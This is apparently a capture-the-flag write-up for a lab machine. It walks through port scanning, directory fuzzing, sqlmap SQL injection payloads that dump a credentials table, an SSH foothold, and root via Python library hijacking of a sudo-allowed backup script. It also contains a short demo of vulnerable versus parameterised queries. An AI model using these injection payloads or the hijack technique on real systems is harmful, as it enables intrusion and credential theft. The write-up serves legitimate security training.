Category: SQL Injection
Obtain user and root flags
Answer all questions
The Brew brothers have a vulnerable Website. Can you hack into it?
Diving into the barrel
The box is pretty direct and easy because we already know we are supposed to perform SQL injection on a website; we just don't know where it occurs.
Before anything, check if your VPN is running and try pinging the box to ensure it's up for hacking.
A toast to Nmap
We need to run a simple yet comprehensive nmap scan to find which port the web server is hosted on.
nmap 10.14.0.32
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
Nmap done: 1 IP address (1 host up) scanned in 50.52 seconds
Sweet!! We have 2 ports open: 80 http, 22 ssh
As we saw earlier, we are supposed to perform SQL injection, so no need to concentrate on ssh. If you find yourself brute-forcing ssh, just know you're doing something wrong (or not :-) )
Anyway without wasting time, let's jump straight into enumerating the web server
Bytes and Barleys: Apache's Tap
First of all, we need to enumerate the webserver manually by visiting the website in our browser.
Honestly, that doesn't look good at all. The only things we should be looking at here are the Apache version, developer comments, or response headers (for starters), but this should not stop us from doing further enumeration.
We need to find that SQLi by "fire by ffuf". You see what I did there? OK, moving on!
Fizzing Fuzz and Fermented
After not finding anything useful on the default Apache page, we move forward to fuzzing for hidden directories and files using ffuf or feroxbuster. You can use feroxbuster because I like them and they have good color output.
ffuf -u "http://10.14.0.32/FUZZ" -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -mc all -fc 404 -ic -e .bak,.db,.config,.txt,.backup,.php,.html,.htm,.tar,.zip,.js,.env,.proto -c
As you can see, my syntax is longer than NFT hype; let's try another one with feroxbuster:
feroxbuster -u http://10.14.0.32 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x py,html,config,conf,txt,php,dev,backup,bak,pcap,properties,jpg,png,jpeg,pdf,db -k
LMAO, still longer.
The advantage of using feroxbuster is that it fuzzes recursively, and it has a cool name: "Ferric Oxide"
And the results are out:
http://10.14.0.32/index.html
http://10.14.0.32/website
http://10.14.0.32/website/index.html
http://10.14.0.32/website/search.html
http://10.14.0.32/website/search.php
http://10.14.0.32/website/contact.html
http://10.14.0.32/website/contact.php
http://10.14.0.32/website/l.txt
That's brilliant, innit! We have something to look into.
I assume we all hate PHP, let's get into injectin'
Are we though? We shall find that out later. Moving on.
Bruh!!?? We didn't even search for anything, but it's OK.
Since we are not getting anything useful so far, we need to capture the requests using Burp to see what's brewing down there.
We are onto nothing here. Let's try saving both requests and running them through SQLmap, hoping for the best.
That didn't work. I guess we should re-evaluate our choices about our hate for PHP and direct it to HTML. Remember we have other endpoints with the same names but with a .html extension. We should check them out:
Damn!, That's a lot of input fields you got there. Moving on!
Now that's where I would like to inject my bad stuff.
A shot of SQL Injection: Brew with Caution!
We can capture a search request to http://10.14.0.32/website/search.html and take it through sqlmap to see if we can get anything juicy:
sqlmap -r search --risk 3 --level 5 --dbs
Parameter: search (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: search=hHIb' AND (SELECT 8709 FROM (SELECT(SLEEP(5)))mmPE) AND 'lQVH'='lQVH

    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: search=hHIb' UNION ALL SELECT CONCAT(0x7176626a71,0x734243434c67584b654d786e6173774b4a76596348697a4d515073694e69456874766a774d47484d,0x7178707671),NULL-- -
Holy Hack!!!! This should be easy.
available databases [7]:
[*] creds
[*] information_schema
[*] lol
[*] mysql
[*] performance_schema
[*] products
[*] sys
creds: I will have those creds on the go.
Now we run this one-liner that will dump those creds:
sqlmap -r search2.req --batch -D creds --tables --dump
Database: creds
Table: credentials
[1 entry]
+----------+----------+
| password | username |
+----------+----------+
| p*****r  | charles  |
+----------+----------+
Who stores their passwords in clear text? Anyway, that adds a fine addition to our collection.
We can use the creds on ssh and voila! we have our initial foothold.
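The search.php source is not shown in this writeup, so here is an added example (not code from the box or the post) using a Python/sqlite3 stand-in for the products lookup: the concatenated query reproduces the 2-column UNION behaviour sqlmap reported, and the parameterised version beside it is the fix. The products table and rows are constructed sample data.

```python
import sqlite3

# Constructed sample data standing in for the box's "products" database.
PRODUCTS = [("Pale Ale", "hoppy"), ("Stout", "roasted"), ("Lager", "crisp")]


def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE products (name TEXT, description TEXT)")
    con.executemany("INSERT INTO products VALUES (?, ?)", PRODUCTS)
    return con


def search_vulnerable(con, term):
    # String concatenation: a quote in the input closes the literal and the
    # rest of the input is parsed as SQL. This is the defect sqlmap detected.
    sql = "SELECT name, description FROM products WHERE name LIKE '%" + term + "%'"
    return con.execute(sql).fetchall()


def search_fixed(con, term):
    # Parameterised query: the value travels separately from the statement, so
    # quotes or UNION keywords in the input are only characters in the pattern.
    sql = "SELECT name, description FROM products WHERE name LIKE ?"
    return con.execute(sql, ("%" + term + "%",)).fetchall()


# Same shape as sqlmap's UNION probe above: a constant marker plus NULL for the
# second column, with "-- -" commenting out the trailing wildcard and quote.
PROBE = "zzz' UNION ALL SELECT 'marker', NULL-- -"


if __name__ == "__main__":
    db = make_db()
    print(search_vulnerable(db, "ale"))   # [('Pale Ale', 'hoppy')]
    print(search_vulnerable(db, PROBE))   # [('marker', None)]  <- injected row
    print(search_fixed(db, PROBE))        # []                  <- just a search
```

The vulnerable function returns a row the table never contained, which is exactly the signal sqlmap's marker-based UNION test looks for; the fixed function treats the whole probe as a literal search string.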
The Root Beer chronicles
Congratulations on your user access, now the only thing remaining is gaining root access to this machine.
Before pwning, we need to make our environment stable using the following commands:
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
Sweet! Now it's hackin' time. Get your hacker gloves and leggings!!
As we can see in the user's directory, we have a note:
charles@brew-brothers:~$ cat note.txt
Hello charles
Dale here, make sure you finish the backup script for the admin panel.
Cheers,
Dale
And the backup script itself, /home/charles/backup.py:
import random
import requests
import hashlib

url = "http://10.14.0.32"
r = requests.post(url + "/zend.php")
earl = str(r.text)

def encrypt(string):
    sha = hashlib.sha256(string.encode()).hexdigest()
    return sha

print("\n")
crk = encrypt(earl)
crk = crk + str(random.randint(1, 100))
with open("/tmp/websitebackupass.txt", "a") as web:
    web.write(crk + ":" + earl)
    web.write("\n")
Now let's execute sudo -l to see what the local user charles can execute with sudo rights on the machine.
User charles may run the following commands on brew-brothers:
    (ALL) NOPASSWD: /usr/bin/python3.8 /home/charles/backup.py
Do you smell it? Python Library hijacking
Let's get into it, shall WE?
Open random.py with nano or vim in charles's home directory, alongside backup.py, then slap this bad boy in:
import os
os.system("/bin/bash")
Save it and execute backup.py as root to gain root access. EZ
sudo -u root /usr/bin/python3.8 /home/charles/backup.py
root@brew-brothers:/home/charles# id
uid=0(root) gid=0(root) groups=0(root)
root@brew-brothers:/home/charles#
Good luck with your next machine.